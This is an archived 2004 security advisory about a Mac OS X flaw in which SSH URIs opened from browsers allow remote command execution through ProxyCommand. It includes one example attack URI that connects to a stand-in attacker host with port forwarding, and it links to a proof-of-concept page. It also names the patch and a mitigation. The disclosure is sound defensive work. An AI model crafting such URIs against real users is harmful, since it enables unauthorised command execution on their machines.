The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NEWS] SSH URI Handler Code Execution


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 30 May 2004 19:45:18 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NEWS] SSH URI Handler Code Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  SSH URI Handler Code Execution
------------------------------------------------------------------------


SUMMARY

Using Mac OS-X's remote disk mounting and SSH's local command execution 
using ProxyCommand it is possible to perform remote command execution on 
the vulnerable machine.

DETAILS

Vulnerable Systems:
 * Mac OS-X versions 10.3.3 and prior, with various browsers

Immune Systems:
 * Mac OS-X version 10.3.4

SSH allows local command execution using the ProxyCommand option. Instead 
of executing a proxy application it is easily possible to execute any 
desired command. An attacker is also able to forward remote hosts using 
the -R option and setting a null-password account, i.e.:
ssh://ssh haxor.com -R port:localhost:port

The problem stems from inappropriate handling of URI's. Currently, 
non-trivial URIs can be very dangerous even with recent security fixes. 
For example, it is still possible to use paths in URI's using URL 
encoding.

Several browsers are vulnerable to the above-mentioned problem. Among them 
are Safari, Camino, Firefox and Mozilla. For now it seems that Konqueror 
is not vulnerable to this problem and GNOME URI handlers currently have a 
bug that interferes with successful exploitation of this vulnerability. 
Konqueror specifically seems to skip command line arguments, making it 
immune to this issue.

A sample proof-of-concept that can be used for testing is provided  
<http://www.insecure.ws/safari/0x06_test.html>; here. The HTML page will 
attempt to execute a command using the above-mentioned problem (not 
harmful).

Patch Availability:
In order to mitigate the vulnerability, upgrade to version 10.3.4. There 
is also a simple and recommended fix at  
<http://www.unsanity.com/haxies/pa/>; http://www.unsanity.com/haxies/pa/ 
for Mac OS-X.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> kang.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру